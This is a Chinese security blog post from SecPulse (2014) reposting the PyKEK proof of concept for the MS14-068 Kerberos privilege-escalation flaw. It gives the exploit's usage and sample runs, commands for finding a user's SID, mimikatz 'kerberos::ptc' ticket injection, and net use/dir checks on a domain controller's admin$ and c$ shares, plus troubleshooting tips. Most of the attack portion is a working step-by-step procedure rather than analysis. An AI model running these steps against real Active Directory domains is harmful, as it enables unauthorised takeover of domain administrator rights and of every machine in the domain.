数日前 安全脉搏播报了《MS14-068 Kerberos Domain Privilege Escalation》,安全运维和渗透师必关注的一个漏洞,该漏洞可能允许攻击者提升普通域用户账户为域管理员账户。
老外在github给出了一个POC,先分享如下:
![图片[1]-MS14-068 privilege escalation PoC-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2014/12/Cyber_Bully.jpg)
Python Kerberos Exploitation Kit
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
For now, only a few functionalities have been implemented (in a quite Quick’n’Dirty way) to exploit MS14-068 (CVE-2014-6324) .
More is coming…
Author
Sylvain Monné
Contact : sylvain dot monne at solucom dot fr
Special thanks to: Benjamin DELPY gentilkiwi
Library content
- kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions
- kek.ccache: Credential Cache Binary Format (cchache)
- kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC)
- kek.crypto: Kerberos and MS specific cryptographic functions
Exploits
ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
- Domain Users (513)
- Domain Admins (512)
- Schema Admins (518)
- Enterprise Admins (519)
- Group Policy Creator Owners (520)
Usage :
USAGE:ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>OPTIONS: -p <clearPassword> --rc4 <ntlmHash>
Example usage :
Linux (tested with samba and MIT Kerberos)
root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.locPassword: [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Creating ccache file '[email protected]'... Done!root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0 On Windows
python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.locmimikatz.exe "kerberos::ptc [email protected]" exit
SID获取方法:
1)wmic useraccount where name=”USERNAME” get sid
2)whoami /all 本机可以直接查出自己的SID;
胖编想 在未及时patch的内网内是不是要如鱼得水 随意穿插呢?那么内网渗透门槛又被拉低了?
为不能访问github的小朋友们提供百度盘链接,胖编这么贴心,应该能骗得主编表侄女的欢心了吧,想想就开心,想想就自信。
测试
Update:1) use ms14-068.pyms14-068.py -u [email protected] -s S-1-5-21-3653881884-3918934852-1693569208-8965 -d DC2.secpulse.localPassword: [+] Building AS-REQ for DC2.secpulse.local... Done! [+] Sending AS-REQ to DC2.secpulse.local... Done! [+] Receiving AS-REP from DC2.secpulse.local... Done! [+] Parsing AS-REP from DC2.secpulse.local... Done! [+] Building TGS-REQ for DC2.secpulse.local... Done! [+] Sending TGS-REQ to DC2.secpulse.local... Done! [+] Receiving TGS-REP from DC2.secpulse.local... Done! [+] Parsing TGS-REP from DC2.secpulse.local... Done! [+] Creating ccache file '[email protected]'... Done!2)put your [email protected] file into mimikatz directory 最新版本的mimikatz才支持kerberos::ptc模块,下载地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20141120否则会出现ERROR mimikatz_doLocal ; "ptc" command of "kerberos" module not found !3)新版本执行mimikatz.exe log "kerberos::ptc [email protected]" exitUsing 'mimikatz.log' for logfile : OKmimikatz(commandline) # kerberos::ptc [email protected] : (01) : secpulse ; @ SECPULSE.LOCALData 0 Start/End/MaxRenew: 2014/12/7 9:43:01 ; 2014/12/7 19:43:01 ; 2014/12/14 9:43:01 Service Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL Target Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL Client Name (01) : secpulse ; @ SECPULSE.LOCAL Flags 50a10000 : name_canonicalize ; pre_authent ; renewable ; proxiable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 1af2c0401238d0346b5456788atf1140 Ticket : 0x00000000 - null ; kvno = 2 [...] * Injecting ticket : OKmimikatz(commandline) # exitBye!4)如果injecte成功 你有可能获得到了域管理session那么klist看一下是否有了kerberos Ticket那么 测试一下 net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~备注:测试环境: win7,在xp下mimikatz会出错 python2.7,使用更高版本比如python3.3脚本会报错 在本机以local admin登录,如果以域用户登录提权会失败 如果在以上操作下仍然失败,建议重启主机,并用域管理员在域内新建普通用户,以新建用户的用户名密码执行python脚本,重复以上流程
![图片[2]-MS14-068 privilege escalation PoC-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2014/12/ADS-Kali-MS14068-Mimikatz-TGTInjection-AccesstoDC-NTDS.png)
老外这篇是以 local admin(not with AD domain credentials)登陆的,成功获得域控机器权限。
![图片[3]-MS14-068 privilege escalation PoC-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/2014/12/A1A4F3A4-D211-47F2-A30E-06611936789C.png)
打了patch的暂时就没办法利用啦。
本文作者:SP胖编
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/2874.html
暂无评论内容